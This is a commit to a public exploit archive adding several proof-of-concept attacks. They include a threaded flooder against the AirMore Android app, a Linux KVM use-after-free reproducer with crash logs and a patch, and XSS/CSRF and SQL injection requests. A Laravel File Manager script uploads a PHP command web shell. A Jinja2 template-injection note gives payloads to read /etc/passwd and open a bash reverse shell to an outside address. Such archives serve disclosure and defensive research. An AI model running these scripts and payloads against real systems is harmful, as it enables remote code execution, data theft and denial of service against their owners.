DB: 2019-02-16

9 changes to exploits/shellcodes ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (DoS) ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (PoC) AirMore 1.6.1 - Denial of Service (PoC) Free IP Switcher 3.1 - 'Computer Name' Denial of Service (PoC) Navicat for Oracle 12.1.15 - _Password_ Denial of Service (PoC) VSCO 1.1.1.0 - Denial of Service (PoC) Linux - 'kvm_ioctl_create_device()' NULL Pointer Dereference Webiness Inventory 2.3 - SQL Injection Webiness Inventory 2.3 - 'order' SQL Injection MyBB Trash Bin Plugin 1.1.3 - Cross-Site Scripting / Cross-Site Request Forgery Jinja2 2.10 - 'from_string' Server Side Template Injection qdPM 9.1 - 'search_by_extrafields[]' SQL Injection UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary File Upload
2019-02-16 05:01:55 +00:00 · 2019-02-16 05:01:55 +00:00 · f3f1427938
commit f3f1427938
parent 5f3f5c8f09
10 changed files with 641 additions and 2 deletions
--- a/exploits/android/dos/46381.py
+++ b/exploits/android/dos/46381.py
@ -0,0 +1,49 @@
+#!/usr/bin/python
+#coding: utf-8
+
+# ************************************************************************
+# *                Author: Marcelo Vázquez (aka s4vitar)                 *
+# *     AirMore 1.6.1 Remote Denial of Service (DoS) & System Freeze     *
+# ************************************************************************
+
+# Exploit Title: AirMore 1.6.1 Remote Denial of Service (DoS) & System Freeze
+# Date: 2019-02-14
+# Exploit Author: Marcelo Vázquez (aka s4vitar)
+# Vendor Homepage: https://airmore.com/
+# Software Link: https://airmore.com/download
+# Version: <= AirMore 1.6.1
+# Tested on: Android
+
+import sys, requests, threading, signal
+
+def handler(signum, frame):
+        print '\nFinishing program...\n'
+        sys.exit(0)
+
+if len(sys.argv) != 3:
+	print "\nUsage: python " + sys.argv[0] + " <ip_address> <port>\n"
+	print "Example: python AirMore_dos.py 192.168.1.125 2333\n"
+	sys.exit(0)
+
+def startAttack(url):
+	url_destination = url + '/?Key=PhoneRequestAuthorization'
+	headers = {'Origin': url, 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'es-ES,es;q=0.9,en;q=0.8', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36', 'Content-Type': 'text/plain;charset=UTF-8', 'accept': 'text/plain', 'Referer': url, 'Connection': 'keep-alive'}
+
+	r = requests.post(url_destination, headers=headers)
+
+if __name__ == '__main__':
+
+	signal.signal(signal.SIGINT, handler)
+	url = 'http://' + sys.argv[1] + ':' + sys.argv[2]
+
+	threads = []
+
+	for i in xrange(0, 10000):
+		t = threading.Thread(target=startAttack, args=(url,))
+		threads.append(t)
+
+	for x in threads:
+		x.start()
+
+	for x in threads:
+		x.join()
--- a/exploits/linux/dos/46388.txt
+++ b/exploits/linux/dos/46388.txt
@ -0,0 +1,288 @@
+kvm_ioctl_create_device() contains the following code:
+
+        dev = kzalloc(sizeof(*dev), GFP_KERNEL);
+        if (!dev)
+                return -ENOMEM;
+
+        dev->ops = ops;
+        dev->kvm = kvm;
+
+        mutex_lock(&kvm->lock);
+        ret = ops->create(dev, cd->type);
+        if (ret < 0) {
+                mutex_unlock(&kvm->lock);
+                kfree(dev);
+                return ret;
+        }
+        list_add(&dev->vm_node, &kvm->devices);
+        mutex_unlock(&kvm->lock);
+
+        if (ops->init)
+                ops->init(dev);
+
+        ret = anon_inode_getfd(ops->name, &kvm_device_fops, dev, O_RDWR | O_CLOEXEC);
+        if (ret < 0) {
+                mutex_lock(&kvm->lock);
+                list_del(&dev->vm_node);
+                mutex_unlock(&kvm->lock);
+                ops->destroy(dev);
+                return ret;
+        }
+
+        kvm_get_kvm(kvm);
+        cd->fd = ret;
+
+This code:
+
+1. creates a device that holds a reference to the VM object (with a borrowed
+   reference, the VM's refcount has not been bumped yet)
+2. initializes the device
+3. transfers the reference to the device to the caller's file descriptor table
+4. calls kvm_get_kvm() to turn the borrowed reference to the VM into a real
+   reference
+
+The ownership transfer in step 3 must not happen before the reference to the VM
+becomes a proper, non-borrowed reference, which only happens in step 4.
+After step 3, an attacker can close the file descriptor and drop the borrowed
+reference, which can cause the refcount of the kvm object to drop to zero.
+
+Reproducer code:
+
+=================================
+// run as `gcc -o kvm_fd_install kvm_fd_install.c -Wall -pthread && ./kvm_fd_install`
+#include <pthread.h>
+#include <fcntl.h>
+#include <err.h>
+#include <linux/kvm.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <unistd.h>
+
+static int predicted_fd = -1;
+static volatile int ready = 0;
+
+static void *do_close_predicted_fd(void *dummy) {
+  ready = 1;
+  while (1) close(predicted_fd);
+  return NULL; /*unreachable*/
+}
+
+int main(void) {
+  int kvm = open("/dev/kvm", O_RDWR);
+  if (kvm == -1) err(1, "open kvm");
+  int vm = ioctl(kvm, KVM_CREATE_VM, 0);
+  if (vm < 0) err(1, "KVM_CREATE_VM");
+
+  predicted_fd = dup(0);
+  if (predicted_fd == -1) err(1, "dup");
+  close(predicted_fd);
+
+  pthread_t thread;
+  if (pthread_create(&thread, NULL, do_close_predicted_fd, NULL)) errx(1, "pthread_create");
+  while (ready == 0) /*spin*/;
+
+  struct kvm_create_device cd = {
+    .type = KVM_DEV_TYPE_VFIO,
+    .fd = -1, //outparm
+    .flags = 0
+  };
+  if (ioctl(vm, KVM_CREATE_DEVICE, &cd)) err(1, "KVM_CREATE_DEVICE");
+  printf("created device: %d\n", cd.fd);
+}
+=================================
+
+To reliably reproduce the issue, patch the kernel as follows to widen the race:
+=================================
+diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
+index 5ecea812cb6a..d43677044ec0 100644
+--- a/virt/kvm/kvm_main.c
+++ b/virt/kvm/kvm_main.c
+@@ -51,6 +51,7 @@
+ #include <linux/slab.h>
+ #include <linux/sort.h>
+ #include <linux/bsearch.h>
+#include <linux/delay.h>
+ 
+ #include <asm/processor.h>
+ #include <asm/io.h>
+@@ -2970,6 +2971,8 @@ static int kvm_ioctl_create_device(struct kvm *kvm,
+        bool test = cd->flags & KVM_CREATE_DEVICE_TEST;
+        int ret;
+ 
+       pr_warn("kvm_ioctl_create_device: entry: refcount=%u\n", refcount_read(&kvm->users_count));
+
+        if (cd->type >= ARRAY_SIZE(kvm_device_ops_table))
+                return -ENODEV;
+ 
+@@ -3000,6 +3003,8 @@ static int kvm_ioctl_create_device(struct kvm *kvm,
+        if (ops->init)
+                ops->init(dev);
+ 
+       pr_warn("kvm_ioctl_create_device: before anon_inode_getfd: refcount=%u\n", refcount_read(&kvm->users_count));
+
+        ret = anon_inode_getfd(ops->name, &kvm_device_fops, dev, O_RDWR | O_CLOEXEC);
+        if (ret < 0) {
+                mutex_lock(&kvm->lock);
+@@ -3009,8 +3014,13 @@ static int kvm_ioctl_create_device(struct kvm *kvm,
+                return ret;
+        }
+ 
+       pr_warn("kvm_ioctl_create_device: after anon_inode_getfd: refcount=%u\n", refcount_read(&kvm->users_count));
+       msleep(100);
+       pr_warn("kvm_ioctl_create_device: after sleeping: refcount=%u\n", refcount_read(&kvm->users_count));
+
+        kvm_get_kvm(kvm);
+        cd->fd = ret;
+       pr_warn("kvm_ioctl_create_device: exiting: refcount=%u\n", refcount_read(&kvm->users_count));
+        return 0;
+ }
+=================================
+
+splat in a patched kernel:
+=================================
+[  224.536858] kvm_ioctl_create_device: entry: refcount=1
+[  224.539410] kvm_ioctl_create_device: before anon_inode_getfd: refcount=1
+[  224.541542] kvm_ioctl_create_device: after anon_inode_getfd: refcount=1
+[  224.651860] BUG: unable to handle kernel paging request at ffffc900015deb08
+[  224.653744] #PF error: [normal kernel read fault]
+[  224.655032] PGD 1ead35067 P4D 1ead35067 PUD 1eaeb6067 PMD 1e2c46067 PTE 0
+[  224.656834] Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC KASAN
+[  224.658364] CPU: 0 PID: 1155 Comm: kvm_fd_install Not tainted 5.0.0-rc3+ #251
+[  224.660252] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
+[  224.662551] RIP: 0010:kvm_vm_ioctl+0xd75/0xdd0
+[  224.663746] Code: c7 c7 a0 f3 a0 a8 e8 53 fa 21 00 bf 64 00 00 00 e8 a0 e5 24 00 be 04 00 00 00 4c 89 ef e8 03 ba 42 00 4c 89 ef e8 cb d8 42 00 <8b> b5 08 9b 00 00 48 c7 c7 00 f4 a0 a8 e8 22 fa 21 00 48 89 ef e8
+[  224.668662] RSP: 0018:ffff8881e3c3f988 EFLAGS: 00010246
+[  224.670057] RAX: 0000000000000000 RBX: 1ffff1103c787f36 RCX: ffffffffa6a2c325
+[  224.671950] RDX: 0000000000000003 RSI: dffffc0000000000 RDI: ffffc900015deb08
+[  224.673835] RBP: ffffc900015d5000 R08: fffff520002bbd62 R09: fffff520002bbd62
+[  224.675731] R10: 0000000000000001 R11: fffff520002bbd61 R12: ffff8881d65863e0
+[  224.677615] R13: ffffc900015deb08 R14: ffff8881d65863c8 R15: ffffffffa9653bc0
+[  224.679506] FS:  00007f11f9500700(0000) GS:ffff8881eb000000(0000) knlGS:0000000000000000
+[  224.681643] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+[  224.684886] CR2: ffffc900015deb08 CR3: 00000001dfc20003 CR4: 00000000003606f0
+[  224.686788] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+[  224.688674] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+[  224.690565] Call Trace:
+[...]
+[  224.721351]  do_vfs_ioctl+0x134/0x8f0
+[...]
+[  224.732860]  ksys_ioctl+0x70/0x80
+[  224.733749]  __x64_sys_ioctl+0x3d/0x50
+[  224.734764]  do_syscall_64+0x73/0x160
+[  224.735743]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
+[  224.737092] RIP: 0033:0x7f11f8e21dd7
+[  224.738048] Code: 00 00 00 48 8b 05 c1 80 2b 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 91 80 2b 00 f7 d8 64 89 01 48
+[  224.742945] RSP: 002b:00007ffeb6611e58 EFLAGS: 00000202 ORIG_RAX: 0000000000000010
+[  224.744932] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f11f8e21dd7
+[  224.746810] RDX: 00007ffeb6611e64 RSI: 00000000c00caee0 RDI: 0000000000000004
+[  224.748681] RBP: 00007ffeb6611e80 R08: 00007f11f8d40700 R09: 00007f11f8d40700
+[  224.750556] R10: 00007f11f8d409d0 R11: 0000000000000202 R12: 0000564cddd8a7b0
+[  224.752433] R13: 00007ffeb6611f60 R14: 0000000000000000 R15: 0000000000000000
+[  224.754311] Modules linked in: btrfs xor zstd_compress raid6_pq
+[  224.755904] CR2: ffffc900015deb08
+[  224.756792] ---[ end trace 670d8a6b1c3ab210 ]---
+=================================
+
+Without the patch, I can still crash a Debian stable distro kernel by running
+the reproducer in a loop (`while true; do ./kvm_fd_install; done`), but it takes
+a while to trigger:
+=================================
+[  251.054762] BUG: unable to handle kernel NULL pointer dereference at 00000000000000a8
+[  251.057734] IP: [<ffffffff95a1695b>] down_write+0x1b/0x40
+[  251.059903] PGD 0 
+
+[  251.061455] Oops: 0002 [#1] SMP
+[  251.062661] Modules linked in: ipt_MASQUERADE nf_nat_masquerade_ipv4 nf_conntrack_netlink nfnetlink xfrm_user xfrm_algo iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 xt_addrtype iptable_filter xt_conntrack nf_nat nf_conntrack br_netfilter bridge stp llc aufs(O) overlay snd_hda_codec_generic kvm_intel snd_hda_intel qxl kvm ttm irqbypass crct10dif_pclmul crc32_pclmul ghash_clmulni_intel drm_kms_helper snd_hda_codec snd_hda_core joydev virtio_balloon snd_hwdep evdev sg snd_pcm 9pnet_virtio serio_raw snd_timer snd button virtio_console binfmt_misc soundcore pcspkr drm 9p 9pnet fscache ip_tables x_tables autofs4 ext4 crc16 jbd2 fscrypto ecb mbcache btrfs crc32c_generic xor hid_generic usbhid hid raid6_pq sr_mod cdrom ata_generic virtio_blk virtio_net crc32c_intel ata_piix aesni_intel uhci_hcd
+[  251.085764]  ehci_pci aes_x86_64 ehci_hcd glue_helper libata lrw gf128mul ablk_helper psmouse i2c_piix4 cryptd virtio_pci usbcore virtio_ring usb_common scsi_mod virtio floppy
+[  251.090094] CPU: 4 PID: 6392 Comm: kvm_fd_install Tainted: G           O    4.9.0-8-amd64 #1 Debian 4.9.130-2
+[  251.092751] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
+[  251.094947] task: ffff949b676f10c0 task.stack: ffffb79691840000
+[  251.096524] RIP: 0010:[<ffffffff95a1695b>]  [<ffffffff95a1695b>] down_write+0x1b/0x40
+[  251.098605] RSP: 0018:ffffb79691843bf0  EFLAGS: 00010246
+[  251.100029] RAX: 00000000000000a8 RBX: 00000000000000a8 RCX: ffffb79691843c28
+[  251.101904] RDX: ffffffff00000001 RSI: 0000000000000286 RDI: 00000000000000a8
+[  251.103786] RBP: ffff949b4650b1d8 R08: 0000000000000000 R09: 0000000000000000
+[  251.105659] R10: ffff949b66a84510 R11: ffffdb9787f9bf80 R12: ffff949b4650b220
+[  251.107556] R13: ffff949b4650b180 R14: ffffffff96310034 R15: ffff949b4650b180
+[  251.109423] FS:  0000000000000000(0000) GS:ffff949b73d00000(0000) knlGS:0000000000000000
+[  251.111560] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+[  251.113081] CR2: 00000000000000a8 CR3: 00000001cf808000 CR4: 0000000000360670
+[  251.114956] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+[  251.116847] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+[  251.118718] Stack:
+[  251.119277]  ffff949b67cc0000 ffffffff956933f1 ffffb79691843c00 ffff949b67cc0000
+[  251.122232]  ffff949b67cc0000 ffff949b69ce4b68 ffff949b6a624060 ffff949b693cd740
+[  251.124294]  ffff949b69ce4b68 ffffffffc07410b2 ffff949b67cc0000 0000000000000008
+[  251.126345] Call Trace:
+[  251.127015]  [<ffffffff956933f1>] ? debugfs_remove_recursive+0x51/0x1c0
+[  251.128780]  [<ffffffffc07410b2>] ? kvm_put_kvm+0x32/0x1d0 [kvm]
+[  251.130366]  [<ffffffffc07412bd>] ? kvm_vm_release+0x1d/0x30 [kvm]
+[  251.132000]  [<ffffffff9560cfb8>] ? __fput+0xd8/0x220
+[  251.133327]  [<ffffffff95498a5f>] ? task_work_run+0x7f/0xa0
+[  251.134790]  [<ffffffff9547ed15>] ? do_exit+0x2d5/0xaf0
+[  251.136163]  [<ffffffff9547f5aa>] ? do_group_exit+0x3a/0xa0
+[  251.137618]  [<ffffffff9548a5f9>] ? get_signal+0x299/0x640
+[  251.139056]  [<ffffffff95426476>] ? do_signal+0x36/0x6a0
+[  251.140458]  [<ffffffffc075ca25>] ? kvm_arch_hardware_disable+0x15/0x40 [kvm]
+[  251.142324]  [<ffffffff9560d05d>] ? __fput+0x17d/0x220
+[  251.143687]  [<ffffffff95498a64>] ? task_work_run+0x84/0xa0
+[  251.145156]  [<ffffffff95403721>] ? exit_to_usermode_loop+0x71/0xb0
+[  251.146794]  [<ffffffff95403bcd>] ? do_syscall_64+0xdd/0xf0
+[  251.148261]  [<ffffffff95a18f8e>] ? entry_SYSCALL_64_after_swapgs+0x58/0xc6
+[  251.150074] Code: 01 74 08 48 c7 43 20 01 00 00 00 5b c3 0f 1f 00 0f 1f 44 00 00 53 48 89 fb e8 b2 df ff ff 48 ba 01 00 00 00 ff ff ff ff 48 89 d8 <f0> 48 0f c1 10 85 d2 74 05 e8 17 be d2 ff 65 48 8b 04 25 c0 fb 
+[  251.157011] RIP  [<ffffffff95a1695b>] down_write+0x1b/0x40
+[  251.158480]  RSP <ffffb79691843bf0>
+[  251.159418] CR2: 00000000000000a8
+[  251.160300] ---[ end trace b3803036d037ea83 ]---
+[  251.161513] Fixing recursive fault but reboot is needed!
+=================================
+
+I have requested a CVE identifier from MITRE, but haven't heard back yet.
+
+I am attaching a suggested patch; here's an inline copy for review (with
+clobbered whitespace):
+
+===========================================
+From 7396c501baf3f066c05a74c790775c2c686be8a7 Mon Sep 17 00:00:00 2001
+From: Jann Horn <jannh@google.com>
+Date: Sat, 26 Jan 2019 01:19:40 +0100
+Subject: [PATCH] kvm: fix temporary refcount drop in kvm_ioctl_create_device()
+
+As soon as we call anon_inode_getfd(), userspace can close the device,
+causing a kvm_put_kvm() call that drops a reference. This means that we
+need to grab a reference for the device before anon_inode_getfd(),
+otherwise the VM can disappear from under us.
+
+Fixes: 852b6d57dc7f ("kvm: add device control API")
+Cc: stable@kernel.org
+Signed-off-by: Jann Horn <jannh@google.com>
+---
+ virt/kvm/kvm_main.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
+index 5ecea812cb6a..585845203db8 100644
+--- a/virt/kvm/kvm_main.c
+++ b/virt/kvm/kvm_main.c
+@@ -3000,8 +3000,10 @@ static int kvm_ioctl_create_device(struct kvm *kvm,
+        if (ops->init)
+                ops->init(dev);
+ 
+       kvm_get_kvm(kvm);
+        ret = anon_inode_getfd(ops->name, &kvm_device_fops, dev, O_RDWR | O_CLOEXEC);
+        if (ret < 0) {
+               kvm_put_kvm(kvm);
+                mutex_lock(&kvm->lock);
+                list_del(&dev->vm_node);
+                mutex_unlock(&kvm->lock);
+@@ -3009,7 +3011,6 @@ static int kvm_ioctl_create_device(struct kvm *kvm,
+                return ret;
+        }
+ 
+-       kvm_get_kvm(kvm);
+        cd->fd = ret;
+        return 0;
+ }
+-- 
+2.20.1.495.gaa96b0ce6b-goog
+===========================================
--- a/exploits/php/webapps/46384.txt
+++ b/exploits/php/webapps/46384.txt
@ -0,0 +1,42 @@
+# Exploit Title: MyBB Trash Bin Plugin 1.1.3 - Cross-Site Scripting / CSRF
+# Date: 7/17/2018
+# Author: 0xB9
+# Twitter: @0xB9Sec
+# Contact: 0xB9[at]pm.me
+# Software Link: https://community.mybb.com/mods.php?action=view&pid=957
+# Version: 1.1.3
+# Tested on: Ubuntu 18.04
+# CVE: CVE-2018-14575
+
+
+1. Description:
+Creates a trash bin in the ACP where you can recover permanent deleted threads and posts. The thread/post subjects allow XSS and deleted posts can be restored by CSRF.
+ 
+
+2. Proof of Concept:
+
+Cross-Site Scripting
+
+- Create a new thread with the following subject  <script>alert('XSS')</script>
+- Permanently delete that thread
+- Alert is located in threads trash bin localhost/[path]/admin/index.php?module=tools-trashbin and localhost/admin/index.php?module=tools-trashbin&action=posts
+
+- Reply to a post and change the subject to the following  <script>alert('XSS')</script>
+- Permanently delete that post
+- Alert is located in posts trash bin localhost/[path]/admin/index.php?module=tools-trashbin&action=posts
+
+
+Cross-Site Request Forgery
+
+<html>
+	<body>
+		<!-- Restore deleted threads & posts by thread/post ID -->
+		<div class="popup_item_container"><a href="http://localhost/[path]/admin/index.php?module=tools-trashbin&action=threadrestore&tid=1" class="popup_item">Restore</a></div>
+		<script type="text/javascript">
+			$("#thread_1").popupMenu();
+		</script>
+	</body>
+</html>
+
+3. Solution:
+Update to 1.1.4
--- a/exploits/php/webapps/46387.txt
+++ b/exploits/php/webapps/46387.txt
@ -0,0 +1,36 @@
+===========================================================================================
+# Exploit Title: qdPM 9.1 - 'search_by_extrafields[]' SQL Injection
+# Date: 14-02-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: http://qdpm.net
+# Software Link: http://qdpm.net/download-qdpm-free-project-management
+# Version: v9.1
+# Category: Webapps
+# Tested on: Wamp64, @Win
+# Software description:
+  Free project management tool for small team
+  qdPM is a free web-based project management tool suitable for a
+small team working on multiple projects.
+  It is fully configurable. You can easy manage Projects, Tasks and
+People. Customers interact
+  using a Ticket System that is integrated into Task management.
+===========================================================================================
+# POC - SQLi
+# Parameters : search_by_extrafields[]
+# Attack Pattern : URL encoded POST input search_by_extrafields[] was set to \
+  Error message found : You have an error in your SQL syntax
+# POST Request: http://localhost/qdpm/index.php/users
+===========================================================================================
+POST /qdpm/index.php/users HTTP/1.1
+Content-Length: 45
+Content-Type: application/x-www-form-urlencoded
+Referer: http://localhost/qdPM/
+Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1
+Host: localhost
+Connection: Keep-alive
+Accept-Encoding: gzip,deflate
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21
+(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
+Accept: */*
+
+search[keywords]=&search_by_extrafields[]=%5c
--- a/exploits/php/webapps/46389.py
+++ b/exploits/php/webapps/46389.py
@ -0,0 +1,88 @@
+### Exploit Title: UniSharp Laravel File Manager - Arbitrary File Upload
+##
+## Google Dork: inurl:"laravel-filemanager?type=Files" -site:github.com -site:github.io
+## Exploit Author: Mohammad Danish
+## Vendor Homepage: https://github.com/UniSharp/laravel-filemanager
+## Software Link: https://github.com/UniSharp/laravel-filemanager
+## Version: v2.0.0-alpha7 & v.2.0
+## 
+##  Exploit: UniSharp Laravel File Manager - Arbitrary File Upload
+##  Reference: https://github.com/UniSharp/laravel-filemanager/issues/356
+##
+##
+##  Issue Description:
+##    Larvel File Manager by UniSharp allows Arbitrary File Upload if type is set to Files /laravel-filemanager?type=Files
+##
+##*********************
+##IMPORTANT READ
+##*********************
+##  Code is not good written, as I just started learning python
+##
+##**********************
+##  [!!] USAGE: exploit.py <target-ip> <target-port> <laravel_session Cookie>
+##  [!!] USAGE: exploit.py 192.168.100.12 8080 eyJpdiI6IlplemdVaG9FSm9MaXJobEgrYlwvSkhnPT0iLCJ2YWx1ZSI6IkhrZ2R1O..........<YOUR SESSION ID HERE>
+##-----------------------
+##
+
+
+import socket
+import sys
+
+def exploit(host,port,sessionId):
+
+    req = ""
+    req += "POST /laravel-filemanager/upload HTTP/1.1\r\n"
+    req += "Host: "+host+":"+port+"\r\n" 
+    req += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0\r\n"
+    req += "Accept: */*\r\n"
+    req += "Accept-Language: en-US,en;q=0.5\r\n"
+    req += "Accept-Encoding: gzip, deflate\r\n"
+    req += "X-Requested-With: XMLHttpRequest\r\n"
+    req += "Referer: http://"+host+":"+port+"/laravel-filemanager?type=Files\r\n"
+    req += "Content-Length: 527\r\n"
+    req += "Content-Type: multipart/form-data; boundary=---------------------------12194679330849\r\n"
+    req += "Cookie:laravel_session="+sessionId+"\r\n"
+    req += "Connection: keep-alive\r\n"
+    req += "\r\n"
+    req += "\r\n"
+
+    req += "-----------------------------260082409123824\r\n"
+    req += 'Content-Disposition: form-data; name="upload[]"; filename="c0w.php"\r\n'
+    req += 'Content-Type: text/plain\r\n\r\n'
+
+    req += 'Happy Hacking!!\r\n'
+    req += "<?\r\n"
+    req += "system($_REQUEST['cmd']);\r\n"
+    req += "?>\r\n"
+    req += "-------------------\r\n"
+    req += "-----------------------------260082409123824\r\n"
+    req += 'Content-Disposition: form-data; name="working_dir"\r\n'
+    req += "/1\r\n"
+    req += "-----------------------------260082409123824\r\n"
+    req += 'Content-Disposition: form-data; name="type"\r\n'
+
+    req += "Files\r\n"
+    req += "-----------------------------260082409123824\r\n"
+    req += 'Content-Disposition: form-data; name="_token"\r\n'
+
+    req += "MU5XhVxbrkRnkVJFUHCjdfNSVTKm3qro6OgtWXjy\r\n"
+    req += "-----------------------------260082409123824--\r\n"
+
+    s = socket.socket()
+    int_port = int(port)
+    s.connect((host,int_port))
+##    print req
+    s.send(req)
+    response = s.recv(1024)
+    magic = response[-10:]
+    if "OK" in magic:
+        print "[!] Your shell Uploaded successfully to directory /1/c0w.php"
+    else:
+        print "[!] Either the server is not vulnerable OR \r\n1) Check your laravel_session cookie \r\n2) Change working_dir in this exploit \r\n3) Check _token"
+    
+
+
+host = sys.argv[1]
+port = sys.argv[2]
+sessionId = sys.argv[3]
+exploit(host,port,sessionId)
--- a/exploits/python/webapps/46386.py
+++ b/exploits/python/webapps/46386.py
@ -0,0 +1,50 @@
+'''
+# Exploit Title: Jinja2 Command injection from_string function
+# Date: [date]
+# Exploit Author: JameelNabbo
+# Website: Ordina.nl
+# Vendor Homepage: http://jinja.pocoo.org
+# Software Link: https://pypi.org/project/Jinja2/#files
+# Version: 2.10
+# Tested on: Kali Linux
+# CVE-2019-8341
+
+
+// from_string function is prone to SSTI where it takes the "source" parameter as a template object and render it and then return it.
+
+
+//here's an example about the vulnerable code that uses from_string function in order to handle a variable in GET called 'username' and returns Hello {username}:
+'''
+
+import Flask
+import request
+import Jinja2
+
+
+@app.route("/")
+def index():
+            username = request.values.get('username')
+            return Jinja2.from_string('Hello ' + username).render()
+
+
+if __name__ == "__main__":
+            app.run(host='127.0.0.1' , port=4444)
+
+'''
+POC
+//Exploiting the username param
+http://localhost:4444/?username={{4*4}}
+OUTPUT: Hello 16
+
+Reading the /etc/passwd
+
+http://localhost:4444/?username={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
+
+
+Getting a reverse shell
+http://localhost:4444/?username={{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }}
+
+
+How to prevent it:
+Never let the user provide template content.
+'''
--- a/exploits/windows/dos/46382.py
+++ b/exploits/windows/dos/46382.py
@ -0,0 +1,22 @@
+#Exploit Title: Free IP Switcher 3.1 - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2018-02-14
+#Vendor Homepage: http://www.eusing.com/index.html
+#Software Link: http://www.eusing.com/ipscan/free_ip_scanner.htm
+#Tested Version: 3.1 
+#Tested on: Windows 10 Single Language x64 / Windows 7 x32 Service Pack 1
+
+#Steps to produce the crash:
+#1.- Run python code: Free_IP_Switcher_3.1.py
+#2.- Open bd.txt and copy content to clipboard
+#2.- Open Free IP Switcher 
+#3.- Select "Network Adapter"
+#4.- In "Additional" enable "Computer Name" and Paste ClipBoard
+#5.- Click on "Activate"
+#6.- Crashed
+
+cod = "\x41" * 240
+
+f = open('ip_code.txt', 'w')
+f.write(cod)
+f.close()
--- a/exploits/windows/dos/46383.py
+++ b/exploits/windows/dos/46383.py
@ -0,0 +1,29 @@
+#Exploit Title: Navicat for Oracle 12.1.15 - "Password" Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-02-14
+#Vendor Homepage: https://www.navicat.com/es/
+#Software Link: https://www.navicat.com/es/download/navicat-for-oracle
+#Tested Version: 12.1.15
+#Tested on: Windows 10 Single Language x64/ Windows 7 x64 Service Pack 1
+
+#Steps to produce the crash:
+#1.- Run python code: Navicat_for_Oracle_12.1.15.py
+#2.- Open code.txt and copy content to clipboard
+#2.- Open Navicat for Oracle 12.1.15
+#3.- Select "Conexión" 
+#4.- Select "Oracle"
+#5.- In "Nombre de conexión" type "Test"
+#6.- In "Tipo de conexión" select "Basic"
+#7.- In "Host" type 1.1.1.1
+#8.- In "Puerto" type "1521"
+#9.- In "Nombre del servicio" type ORCL
+#10.- In "Nombre de usuario" type "user"
+#11.- In "Contraseña" Paste Clipboard 
+#12.- Select "Aceptar"
+#13.- Crashed
+
+cod = "\x41" * 550
+
+f = open('string.txt', 'w')
+f.write(cod)
+f.close()
--- a/exploits/windows/dos/46385.py
+++ b/exploits/windows/dos/46385.py
@ -0,0 +1,26 @@
+# Exploit Title: VSCO 1.1.1.0 - Denial of Service (PoC)
+# Date: 2/14/2018
+# Author: 0xB9
+# Twitter: @0xB9Sec
+# Contact: 0xB9[at]pm.me
+# Software Link: https://www.microsoft.com/store/productId/9NC1RLNH76PB
+# Version: 1.1.1.0
+# Tested on: Windows 10
+
+# Proof of Concept:
+# Run the python script, it will create a new file "PoC.txt"
+# Copy the text from the generated PoC.txt file to clipboard
+# Paste the text in the top right search bar and hit Search
+# Click back to Home
+# App will now crash
+
+buffer = "A" * 5000
+payload = buffer
+try:
+    f=open("PoC.txt","w")
+    print "[+] Creating %s evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+print "File cannot be created"
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6309,7 +6309,12 @@ id,file,description,date,author,type,platform,port
 46367,exploits/windows/dos/46367.py,"NetworkSleuth 3.0 - 'Name' Denial of Service (PoC)",2019-02-13,"Alejandra Sánchez",dos,windows,
 46371,exploits/windows/dos/46371.py,"Core FTP/SFTP Server 1.2 Build 589.42 - 'User domain' Denial of Service (PoC)",2019-02-14,"Victor Mondragón",dos,windows,
 46378,exploits/windows/dos/46378.py,"MediaMonkey 4.1.23 - '.mp3' URL Denial of Service (PoC)",2019-02-14,"Alejandra Sánchez",dos,windows,
-46380,exploits/android/dos/46380.py,"ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (DoS)",2019-02-14,s4vitar,dos,android,
+46380,exploits/android/dos/46380.py,"ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (PoC)",2019-02-14,s4vitar,dos,android,
+46381,exploits/android/dos/46381.py,"AirMore 1.6.1 - Denial of Service (PoC)",2019-02-15,s4vitar,dos,android,
+46382,exploits/windows/dos/46382.py,"Free IP Switcher 3.1 - 'Computer Name' Denial of Service (PoC)",2019-02-15,"Victor Mondragón",dos,windows,
